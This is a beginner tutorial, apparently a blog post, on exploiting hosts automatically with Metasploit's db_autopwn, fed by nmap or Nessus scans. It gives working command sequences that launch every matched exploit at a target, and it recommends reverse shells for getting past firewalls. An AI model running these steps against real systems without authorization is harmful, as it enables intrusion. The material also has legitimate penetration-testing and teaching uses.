Today we'll look at the most basic and simplest way for a beginner to exploit a vulnerable host. The tools needed are:
nmap
Nessus
Metasploit
Of course, you can also simply use a BackTrack 5 system, since all of the above tools are already integrated into it.
First, Nmap's job is to scan the target host for open ports and services; the db_autopwn command then tries to run exploit code against those open ports and running services. Its scan and exploit results can also be imported into Nessus, a more fine-grained auditing tool.
In Metasploit, you first need to set up a database. Run msfconsole, connect to the database, and then we can start our first attack attempt on BackTrack. We'll also get some English practice along the way ~~
The options provided by db_autopwn:
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
The options marked in bold (-p, -x and -e) are the ones we will use in this guide. However, option “-r” is also quite useful, as a reverse shell has a higher chance of bypassing a firewall once you have successfully exploited a host. You can also use “-q” if you don’t want to see all the module output during autopwn.
First we will look into using db_nmap.
You need to scan the host(s) for open ports so that autopwn knows which ports are open and which services are running:
db_nmap -sV [IP]
Then you just execute autopwn:
db_autopwn -p -e
Now just watch as the exploits ‘flow’. When they finish you can check if any of the exploits succeeded by doing:
sessions -l
The other method, which I personally find more effective, is using Nessus to predetermine the vulnerabilities of the target host. After a scan has finished successfully, go to Reports, select the scan you have just done and click the button called “Download report”. Save it as a .nessus file somewhere on your HDD.
Then in msfconsole do:
db_import /path/to/.nessus
db_autopwn -x -e
Once again you will see the flow of exploits (unless you also specified the -q option). To check if any of the exploits actually worked, once again do:
sessions -l
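To make it clearer what db_import actually takes from the .nessus file and what the -x option then matches against, here is an added Python example (not from the original post and not Metasploit's own importer). It parses a constructed .nessus v2 fragment with placeholder hosts, plugin IDs and reference IDs, and lists the per-port findings that carry a vulnerability reference; the "BID-"/"OSVDB-" prefixes follow the reference naming this example assumes Metasploit uses.

```python
import xml.etree.ElementTree as ET

# Constructed .nessus (v2) fragment: one host, two findings. Only the first
# carries references of the kind db_autopwn -x can match. All values are
# placeholders, not real hosts, plugins or vulnerabilities.
NESSUS_XML = """<?xml version="1.0"?>
<NessusClientData_v2>
  <Report name="constructed-scan">
    <ReportHost name="192.0.2.10">
      <HostProperties>
        <tag name="host-ip">192.0.2.10</tag>
      </HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3"
                  pluginID="100001" pluginName="Constructed SMB finding">
        <cve>CVE-0000-0001</cve>
        <bid>000001</bid>
      </ReportItem>
      <ReportItem port="80" svc_name="www" protocol="tcp" severity="0"
                  pluginID="100002" pluginName="Constructed info-only finding">
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

# Reference tags in a ReportItem and the prefix this example assumes for each.
REF_TAGS = (("cve", ""), ("bid", "BID-"), ("osvdb", "OSVDB-"))


def parse_nessus(xml_text):
    """Return findings as (host, port, protocol, plugin_id, [references])."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        addr = host.get("name")
        for item in host.iter("ReportItem"):
            refs = []
            for tag, prefix in REF_TAGS:
                refs += [prefix + r.text.strip() for r in item.findall(tag) if r.text]
            findings.append((addr, int(item.get("port")), item.get("protocol"),
                             item.get("pluginID"), refs))
    return findings


def findings_with_refs(xml_text):
    """Keep only findings that carry a reference: the ones -x has anything to match."""
    return [f for f in parse_nessus(xml_text) if f[4]]
```

Running findings_with_refs on a real report shows which findings can influence -x at all; informational plugins without references (like the second item above) never select an exploit module.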
I will soon post about what can be done once the host has been exploited successfully and a guide on using the meterpreter session.